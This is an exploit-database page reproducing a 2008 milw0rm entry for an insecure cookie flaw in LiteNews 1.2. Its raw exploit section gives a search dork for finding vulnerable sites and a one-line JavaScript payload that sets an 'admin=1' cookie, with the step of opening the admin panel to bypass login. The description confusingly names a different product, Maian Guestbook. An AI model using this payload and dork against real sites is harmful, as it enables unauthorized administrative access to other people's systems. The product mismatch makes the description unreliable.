litenews-01 - exploit.company

vendor:

LiteNews

by:

Scary-Boys

7.5

CVSS

HIGH

Insecure Cookie Handling

613

CWE

Product Name: LiteNews

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:maian_scripts:litenews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability

Maian Guestbook suffers from a insecure cookie vulnerability where the admin panel only checks if the cookie exists.

Mitigation:

Ensure that the cookie is properly validated and authenticated before allowing access to the admin panel.

Source

Exploit-DB raw data:

#########################################################################
#                                                                       #
#         litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability     #
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys						#
# HOME       : http://scary-boys.com					#
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By litenews"         			        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                        		#
#  Maian Guestbook suffers from a insecure cookie                       #
# the admin panel only checks if the cookie exists. 		        #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "admin=1; path=/";                      #
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin/index.php" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-05]